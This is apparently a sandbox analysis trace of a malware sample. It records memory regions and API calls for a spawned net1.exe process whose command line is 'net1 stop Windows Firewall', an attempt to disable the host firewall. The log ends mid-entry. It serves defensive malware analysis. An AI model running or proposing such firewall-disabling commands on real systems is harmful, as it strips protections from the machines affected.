id = 3018 start_va = 0x6a8d0000 end_va = 0x6a8defff monitored = 0 entry_point = 0x6a8d20e0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 3019 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3020 start_va = 0x6a0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3021 start_va = 0x720000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 3022 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 209 os_tid = 0x1058 Thread: id = 211 os_tid = 0xbb8 Thread: id = 212 os_tid = 0x1308 Process: id = "37" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6f124000" os_pid = "0x648" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xe60" cmd_line = "C:\\Windows\\system32\\net1 stop Windows Firewall" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3023 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3024 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3025 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3026 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3027 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3028 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3029 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3030 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3031 start_va = 0x1f0000 end_va = 0x221fff monitored = 1 entry_point = 0x1f6bc0 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 3032 start_va = 0x230000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3033 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3034 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3035 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3036 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3037 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3038 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 3039 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3040 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 3046 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3047 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3048 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3049 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3050 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3051 start_va = 0x4600000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 3052 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3053 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3054 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3055 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3056 start_va = 0x4230000 end_va = 0x42edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3057 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3058 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3059 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 3060 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3061 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3062 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3063 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3064 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3065 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3066 start_va = 0x6a910000 end_va = 0x6a924fff monitored = 0 entry_point = 0x6a915210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 3067 start_va = 0x6a900000 end_va = 0x6a909fff monitored = 0 entry_point = 0x6a9028d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3068 start_va = 0x6a8c0000 end_va = 0x6a8c7fff monitored = 0 entry_point = 0x6a8c1c60 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 3069 start_va = 0x6a8e0000 end_va = 0x6a8fbfff monitored = 0 entry_point = 0x6a8e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3070 start_va = 0x6a930000 end_va = 0x6a93ffff monitored = 0 entry_point = 0x6a9334d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3071 start_va = 0x6e430000 end_va = 0x6e45efff monitored = 0 entry_point = 0x6e445140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 3072 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3073 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 3074 start_va = 0x6a8d0000 end_va = 0x6a8defff monitored = 0 entry_point = 0x6a8d20e0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 3075 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3076 start_va = 0x4600000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 3077 start_va = 0x4770000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 3078 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3079 start_va = 0x150000 end_va = 0x152fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "neth.dll" filename = "\\Windows\\SysWOW64\\neth.dll" (normalized: "c:\\windows\\syswow64\\neth.dll") Region: id = 3080 start_va = 0x43f0000 end_va = 0x43f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043f0000" filename = "" Region: id = 3081 start_va = 0x4600000 end_va = 0x4600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 3082 start_va = 0x4620000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 3083 start_va = 0x4630000 end_va = 0x4641fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "neth.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\neth.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\neth.dll.mui") Region: id = 3084 start_va = 0x4610000 end_va = 0x4612fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 3085 start_va = 0x4870000 end_va = 0x4c6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Thread: id = 213 os_tid = 0xf20 [0295.520] GetModuleHandleA (lpModuleName=0x0) returned 0x1f0000 [0295.520] __set_app_type (_Type=0x1) [0295.520] __p__fmode () returned 0x74ac4d6c [0295.520] __p__commode () returned 0x74ac5b1c [0295.520] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1f6e00) returned 0x0 [0295.520] __getmainargs (in: _Argc=0x20f688, _Argv=0x20f68c, _Env=0x20f690, _DoWildCard=0, _StartInfo=0x20f69c | out: _Argc=0x20f688, _Argv=0x20f68c, _Env=0x20f690) returned 0 [0295.521] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0295.521] GetConsoleOutputCP () returned 0x1b5 [0295.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x217020 | out: lpCPInfo=0x217020) returned 1 [0295.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0295.789] sprintf_s (in: _DstBuf=0x11ff2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0295.789] setlocale (category=0, locale=".437") returned="English_United States.437" [0295.794] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.794] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0295.794] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Windows Firewall" [0295.794] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11fcd4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0295.794] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x0, Size=0x6e) returned 0x4772780 [0295.794] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fcc8 | out: Buffer=0x11fcc8*=0x4777f78) returned 0x0 [0295.794] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fccc | out: Buffer=0x11fccc*=0x4777f90) returned 0x0 [0295.794] __iob_func () returned 0x74ac1208 [0295.794] _fileno (_File=0x74ac1208) returned 0 [0295.795] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0295.795] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0295.795] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0295.795] _wcsicmp (_String1="config", _String2="stop") returned -16 [0295.795] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0295.795] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0295.795] _wcsicmp (_String1="file", _String2="stop") returned -13 [0295.795] _wcsicmp (_String1="files", _String2="stop") returned -13 [0295.795] _wcsicmp (_String1="group", _String2="stop") returned -12 [0295.795] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0295.795] _wcsicmp (_String1="help", _String2="stop") returned -11 [0295.795] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0295.795] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0295.795] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0295.795] _wcsicmp (_String1="session", _String2="stop") returned -15 [0295.795] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0295.795] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0295.795] _wcsicmp (_String1="share", _String2="stop") returned -12 [0295.795] _wcsicmp (_String1="start", _String2="stop") returned -14 [0295.796] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0295.796] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0295.796] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0295.796] _wcsicmp (_String1="accounts", _String2="Windows") returned -22 [0295.796] _wcsicmp (_String1="computer", _String2="Windows") returned -20 [0295.796] _wcsicmp (_String1="config", _String2="Windows") returned -20 [0295.796] _wcsicmp (_String1="continue", _String2="Windows") returned -20 [0295.796] _wcsicmp (_String1="cont", _String2="Windows") returned -20 [0295.796] _wcsicmp (_String1="file", _String2="Windows") returned -17 [0295.796] _wcsicmp (_String1="files", _String2="Windows") returned -17 [0295.796] _wcsicmp (_String1="group", _String2="Windows") returned -16 [0295.796] _wcsicmp (_String1="groups", _String2="Windows") returned -16 [0295.796] _wcsicmp (_String1="help", _String2="Windows") returned -15 [0295.796] _wcsicmp (_String1="helpmsg", _String2="Windows") returned -15 [0295.796] _wcsicmp (_String1="localgroup", _String2="Windows") returned -11 [0295.796] _wcsicmp (_String1="pause", _String2="Windows") returned -7 [0295.796] _wcsicmp (_String1="session", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="sessions", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="sess", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="share", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="start", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="stats", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="statistics", _String2="Windows") returned -4 [0295.796] _wcsicmp (_String1="stop", _String2="Windows") returned -4 [0295.797] _wcsicmp (_String1="time", _String2="Windows") returned -3 [0295.797] _wcsicmp (_String1="user", _String2="Windows") returned -2 [0295.797] _wcsicmp (_String1="users", _String2="Windows") returned -2 [0295.797] _wcsicmp (_String1="msg", _String2="Windows") returned -10 [0295.797] _wcsicmp (_String1="messenger", _String2="Windows") returned -10 [0295.797] _wcsicmp (_String1="receiver", _String2="Windows") returned -5 [0295.797] _wcsicmp (_String1="rcv", _String2="Windows") returned -5 [0295.797] _wcsicmp (_String1="netpopup", _String2="Windows") returned -9 [0295.797] _wcsicmp (_String1="redirector", _String2="Windows") returned -5 [0295.797] _wcsicmp (_String1="redir", _String2="Windows") returned -5 [0295.797] _wcsicmp (_String1="rdr", _String2="Windows") returned -5 [0295.797] _wcsicmp (_String1=0x1f1ffc, _String2="Windows") returned 6 [0295.797] _wcsicmp (_String1="work", _String2="Windows") returned 6 [0295.797] _wcsicmp (_String1="wksta", _String2="Windows") returned 2 [0295.797] _wcsicmp (_String1="prdr", _String2="Windows") returned -7 [0295.797] _wcsicmp (_String1="devrdr", _String2="Windows") returned -19 [0295.797] _wcsicmp (_String1="lanmanworkstation", _String2="Windows") returned -11 [0295.797] _wcsicmp (_String1="server", _String2="Windows") returned -4 [0295.798] _wcsicmp (_String1="svr", _String2="Windows") returned -4 [0295.798] _wcsicmp (_String1="srv", _String2="Windows") returned -4 [0295.798] _wcsicmp (_String1="lanmanserver", _String2="Windows") returned -11 [0295.798] _wcsicmp (_String1="alerter", _String2="Windows") returned -22 [0295.798] _wcsicmp (_String1="netlogon", _String2="Windows") returned -9 [0295.798] _wcsicmp (_String1="accounts", _String2="Firewall") returned -5 [0295.798] _wcsicmp (_String1="computer", _String2="Firewall") returned -3 [0295.798] _wcsicmp (_String1="config", _String2="Firewall") returned -3 [0295.798] _wcsicmp (_String1="continue", _String2="Firewall") returned -3 [0295.798] _wcsicmp (_String1="cont", _String2="Firewall") returned -3 [0295.798] _wcsicmp (_String1="file", _String2="Firewall") returned -6 [0295.798] _wcsicmp (_String1="files", _String2="Firewall") returned -6 [0295.798] _wcsicmp (_String1="group", _String2="Firewall") returned 1 [0295.798] _wcsicmp (_String1="groups", _String2="Firewall") returned 1 [0295.798] _wcsicmp (_String1="help", _String2="Firewall") returned 2 [0295.798] _wcsicmp (_String1="helpmsg", _String2="Firewall") returned 2 [0295.798] _wcsicmp (_String1="localgroup", _String2="Firewall") returned 6 [0295.798] _wcsicmp (_String1="pause", _String2="Firewall") returned 10 [0295.798] _wcsicmp (_String1="session", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="sessions", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="sess", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="share", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="start", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="stats", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="statistics", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="stop", _String2="Firewall") returned 13 [0295.799] _wcsicmp (_String1="time", _String2="Firewall") returned 14 [0295.799] _wcsicmp (_String1="user", _String2="Firewall") returned 15 [0295.799] _wcsicmp (_String1="users", _String2="Firewall") returned 15 [0295.799] _wcsicmp (_String1="msg", _String2="Firewall") returned 7 [0295.799] _wcsicmp (_String1="messenger", _String2="Firewall") returned 7 [0295.799] _wcsicmp (_String1="receiver", _String2="Firewall") returned 12 [0295.800] _wcsicmp (_String1="rcv", _String2="Firewall") returned 12 [0295.800] _wcsicmp (_String1="netpopup", _String2="Firewall") returned 8 [0295.800] _wcsicmp (_String1="redirector", _String2="Firewall") returned 12 [0295.800] _wcsicmp (_String1="redir", _String2="Firewall") returned 12 [0295.800] _wcsicmp (_String1="rdr", _String2="Firewall") returned 12 [0295.800] _wcsicmp (_String1="workstation", _String2="Firewall") returned 17 [0295.800] _wcsicmp (_String1="work", _String2="Firewall") returned 17 [0295.801] _wcsicmp (_String1="wksta", _String2="Firewall") returned 17 [0295.801] _wcsicmp (_String1="prdr", _String2="Firewall") returned 10 [0295.801] _wcsicmp (_String1="devrdr", _String2="Firewall") returned -2 [0295.801] _wcsicmp (_String1="lanmanworkstation", _String2="Firewall") returned 6 [0295.801] _wcsicmp (_String1="server", _String2="Firewall") returned 13 [0295.801] _wcsicmp (_String1="svr", _String2="Firewall") returned 13 [0295.801] _wcsicmp (_String1="srv", _String2="Firewall") returned 13 [0295.801] _wcsicmp (_String1="lanmanserver", _String2="Firewall") returned 6 [0295.801] _wcsicmp (_String1="alerter", _String2="Firewall") returned -5 [0295.801] _wcsicmp (_String1="netlogon", _String2="Firewall") returned 8 [0295.801] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0295.802] SetThreadUILanguage (LangId=0x0) returned 0x409 [0295.814] LoadLibraryExW (lpLibFileName="neth.dll", hFile=0x0, dwFlags=0x822) returned 0x150002 [0295.902] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc5d, dwLanguageId=0x0, lpBuffer=0x11f7a8, nSize=0x0, Arguments=0x11f7a4 | out: lpBuffer="릠ѷﰰ\x11繴 ౝ") returned 0xff [0295.964] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="CONTINUE: CONT", _Context=0x1eb) returned="CONTINUE: CONT" [0295.964] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nFILE: FILES" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nGROUP: GROUPS" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSESSION: SESSIONS, SESS" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSTATISTICS: STATS" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nUSER: USERS" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVER: SVR, SRV" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0295.965] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.965] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x1eb | out: _String="CONTINUE", _Context=0x1eb) returned="CONTINUE" [0295.965] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0295.965] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477b9a0 | out: _String=0x0, _Context=0x477b9a0) returned=" CONT" [0295.965] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.965] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0295.965] _wcsicmp (_String1="CONT", _String2="Windows") returned -20 [0295.965] _wcsicmp (_String1="CONT", _String2="Firewall") returned -3 [0295.965] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.965] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nFILE", _Context=0x1eb) returned="\r\nFILE" [0295.965] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.966] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477b9c6 | out: _String=0x0, _Context=0x477b9c6) returned=" FILES" [0295.966] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.966] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0295.966] _wcsicmp (_String1="FILES", _String2="Windows") returned -17 [0295.966] _wcsicmp (_String1="FILES", _String2="Firewall") returned -6 [0295.966] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.966] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nGROUP", _Context=0x1eb) returned="\r\nGROUP" [0295.966] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.966] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477b9ea | out: _String=0x0, _Context=0x477b9ea) returned=" GROUPS" [0295.966] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.966] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0295.966] _wcsicmp (_String1="GROUPS", _String2="Windows") returned -16 [0295.966] _wcsicmp (_String1="GROUPS", _String2="Firewall") returned 1 [0295.966] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.966] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nREPLICATOR", _Context=0x1eb) returned="\r\nREPLICATOR" [0295.966] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.967] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477ba12 | out: _String=0x0, _Context=0x477ba12) returned=" REPL" [0295.967] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.967] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0295.967] _wcsicmp (_String1="REPL", _String2="Windows") returned -5 [0295.967] _wcsicmp (_String1="REPL", _String2="Firewall") returned 12 [0295.967] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REPLICATOR" [0295.967] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.967] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0295.967] _wcsicmp (_String1="REPLICATOR", _String2="Windows") returned -5 [0295.967] _wcsicmp (_String1="REPLICATOR", _String2="Firewall") returned 12 [0295.967] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.967] wcstok (in: _String="\r\nSESSION: SESSIONS, 